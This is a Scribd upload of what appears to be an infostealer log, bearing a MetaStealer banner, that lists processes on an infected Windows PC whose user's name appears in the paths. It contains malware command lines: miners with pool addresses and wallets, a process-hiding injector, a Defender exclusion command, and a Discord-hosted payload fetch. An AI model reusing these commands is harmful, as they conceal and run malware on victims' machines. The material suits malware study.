Scribd
Upload
122 views5 pages

Malware Process List Analysis

The document lists process information from a Windows system, including process IDs, names, and command lines. Over 50 running processes are enumerated, covering a variety of system programs and applications like browsers, media players, and mining software.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
122 views5 pages

Malware Process List Analysis

The document lists process information from a Windows system, including process IDs, names, and command lines. Over 50 running processes are enumerated, covering a variety of system programs and applications like browsers, media players, and mining software.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 5

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 772, Name: csrss.exe, CommandLine:


===============
ID: 976, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 544, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1120, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 2188, Name: NVDisplay.Container.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\nv_dispi.inf_amd64_a24f5f4b6b8a2b86\Display.NvContainer\
NVDisplay.Container.exe" -f %ProgramData%\NVIDIA\DisplaySessionContainer%d.log -d
C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_a24f5f4b6b8a2b86\
Display.NvContainer\plugins\Session -r -l 3 -p 30000 -cfg
NVDisplay.ContainerLocalSystem\Session -c
===============
ID: 4816, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 4836, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 4872, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 4944, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 5140, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 5324, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 5676, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 6088, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 5756, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6232, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 6708, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6924, Name: SkypeBackgroundHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\
SkypeBackgroundHost.exe" -ServerName:SkypeBackgroundHost
===============
ID: 6952, Name: SkypeApp.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -
ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
===============
ID: 7304, Name: mstsca.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Roaming\
Microsoft\Network\mstsca.exe"
===============
ID: 7320, Name: oneetx.exe, CommandLine: C:\Users\JOLOHO~1\AppData\Local\Temp\
10180c8ca3\oneetx.exe
===============
ID: 7408, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8164, Name: OneDrive.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\
Microsoft\OneDrive\OneDrive.exe" /background
===============
ID: 7240, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 1212, Name: csrss.exe, CommandLine: "C:\Windows\rss\csrss.exe"
===============
ID: 7752, Name: injector.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\Temp\
csrss\injector\injector.exe" taskmgr.exe "C:\Users\Jolo Hook\AppData\Local\Temp\
csrss\injector\NtQuerySystemInformationHook.dll"
===============
ID: 7360, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 7892, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 7616, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 6576, Name: dllhost.exe, CommandLine: C:\ProgramData\Dllhost\dllhost.exe
===============
ID: 3772, Name: iYbixJmp03yRUVNFEZlOA1Od.exe, CommandLine: "C:\Users\Jolo Hook\
Pictures\Minor Policy\iYbixJmp03yRUVNFEZlOA1Od.exe"
===============
ID: 8032, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup
===============
ID: 2356, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\
v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5
vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
===============
ID: 8072, Name: 934057bb263593087d4cce4817adb057.exe, CommandLine: "C:\Users\Jolo
Hook\AppData\Local\Temp\csrss\934057bb263593087d4cce4817adb057.exe"
===============
ID: 7880, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 848, Name: 9289.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\6f82bd96-
da24-4301-b5ff-137d113838a7\9289.exe" --Task
===============
ID: 6488, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 6052, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 6796, Name: wup.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\Temp\csrss\
wup\xarch\wup.exe" -o dxpools.net:40001 --rig-id 398aded9-2945-4f92-b116-
cded84bc354f --tls --nicehash -o dxpools.net:443 --rig-id 398aded9-2945-4f92-b116-
cded84bc354f --tls --nicehash -o dxpools.net:80 --rig-id 398aded9-2945-4f92-b116-
cded84bc354f --nicehash --http-port 3433 --http-access-token 398aded9-2945-4f92-
b116-cded84bc354f --randomx-wrmsr=-1
===============
ID: 7476, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 3104, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 3248, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6064, Name: winlogson.exe, CommandLine: C:\ProgramData\Dllhost\winlogson.exe -
c config.json
===============
ID: 1396, Name: WinStore.App.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -
ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
===============
ID: 1448, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6308, Name: Microsoft.Photos.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\
Microsoft.Photos.exe" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca
===============
ID: 7732, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8716, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 10208, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5428, Name: backgroundTaskHost.exe, CommandLine: "C:\Windows\system32\
backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
===============
ID: 9936, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 2572, Name: 1PKImfdxRWyn8v24X7hW8T9h.exe, CommandLine: "C:\Users\Jolo Hook\
Pictures\Minor Policy\1PKImfdxRWyn8v24X7hW8T9h.exe"
===============
ID: 7532, Name: c3ipUf96vwdEYEnrFexuolMi.exe, CommandLine: "C:\Users\Jolo Hook\
Pictures\Minor Policy\c3ipUf96vwdEYEnrFexuolMi.exe"
===============
ID: 4696, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 8932, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929160690
===============
ID: 4896, Name: 7507ffc9a340f774985cb5ca11ca78c4.exe, CommandLine: "C:\Users\Jolo
Hook\AppData\Local\Temp\csrss\7507ffc9a340f774985cb5ca11ca78c4.exe" -
xor=9487yH74fU54UlmP
-m=https://cdn.discordapp.com/attachments/1087398815188910163/1087399135994462378/
EupDDwlWsUCMy -btgPool=btg.2miners.com:4040 -
btgWallet=GJNo6VDtjHbMx3dp613eZXcPonhaaLQjbf.q -
ethWallet=0x1158417B5cC69841d7A5b12a7dC207B6CCd5a834.398aded9-2945-4f92-b116-
cded84bc354f -ethPool=eth-eu1.nanopool.org:9999
===============
ID: 6404, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 10072, Name: g.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\Temp\csrss\
wup\g.exe" --algo 144_5 --pers BgoldPoW --server btg.2miners.com:4040 --user
GJNo6VDtjHbMx3dp613eZXcPonhaaLQjbf.q --pass x
===============
ID: 8260, Name: g.exe, CommandLine: "C:\Users\Jolo Hook\AppData\Local\Temp\csrss\
wup\g.exe" --algo 144_5 --pers BgoldPoW --server btg.2miners.com:4040 --user
GJNo6VDtjHbMx3dp613eZXcPonhaaLQjbf.q --pass x --watchdog_child_process0
===============
ID: 4564, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 9780, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 4984, Name: Acrobat.exe, CommandLine: "C:\Program Files (x86)\Adobe\Acrobat
11.0\Acrobat\Acrobat.exe"
===============
ID: 764, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe"
===============
ID: 9704, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.0.2017623505\1857316082" -parentBuildID
20230414125621 -prefsHandle 1788 -prefMapHandle 1804 -prefsLen 27751 -prefMapSize
238661 -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" - {cb5f58d8-5fa7-
4e6b-9aef-e4482a7a6242} 764 "\\.\pipe\gecko-crash-server-pipe.764" 1892 12375bc0
gpu
===============
ID: 8812, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.1.753322059\639007136" -parentBuildID
20230414125621 -prefsHandle 2232 -prefMapHandle 2228 -prefsLen 27751 -prefMapSize
238661 -win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{5314cfe8-70d8-488b-b56b-511968ba8600} 764 "\\.\pipe\gecko-crash-server-pipe.764"
2244 157a4580 socket
===============
ID: 1296, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.2.165050635\64864205" -childID 1 -
isForBrowser -prefsHandle 2752 -prefMapHandle 3080 -prefsLen 27957 -prefMapSize
238661 -jsInitHandle 1360 -jsInitLen 240056 -parentBuildID 20230414125621 -
win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{d39f9d80-4c95-493f-9c80-0a065b0862bf} 764 "\\.\pipe\gecko-crash-server-pipe.764"
3252 15794840 tab
===============
ID: 6620, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.3.316217794\1540459575" -childID 2 -
isForBrowser -prefsHandle 3432 -prefMapHandle 3428 -prefsLen 23946 -prefMapSize
238661 -jsInitHandle 1360 -jsInitLen 240056 -parentBuildID 20230414125621 -
win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{8cde1d5d-bcbf-4abe-b9df-18a4e3ee7894} 764 "\\.\pipe\gecko-crash-server-pipe.764"
3176 1ac8a110 tab
===============
ID: 1200, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.4.1661110139\1347016648" -childID 3 -
isForBrowser -prefsHandle 3584 -prefMapHandle 3588 -prefsLen 23946 -prefMapSize
238661 -jsInitHandle 1360 -jsInitLen 240056 -parentBuildID 20230414125621 -
win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{7d42e0eb-7abe-4b9e-a4fb-ec68bfc1bf60} 764 "\\.\pipe\gecko-crash-server-pipe.764"
3576 1ac8a3f0 tab
===============
ID: 7976, Name: firefox.exe, CommandLine: "C:\Program Files (x86)\Mozilla Firefox\
firefox.exe" -contentproc --channel="764.5.1451481184\255694922" -childID 4 -
isForBrowser -prefsHandle 3724 -prefMapHandle 3728 -prefsLen 23946 -prefMapSize
238661 -jsInitHandle 1360 -jsInitLen 240056 -parentBuildID 20230414125621 -
win32kLockedDown -appDir "C:\Program Files (x86)\Mozilla Firefox\browser" -
{e00712c8-9729-4cd2-86c0-67c798f89611} 764 "\\.\pipe\gecko-crash-server-pipe.764"
3852 1ac8a280 tab

You might also like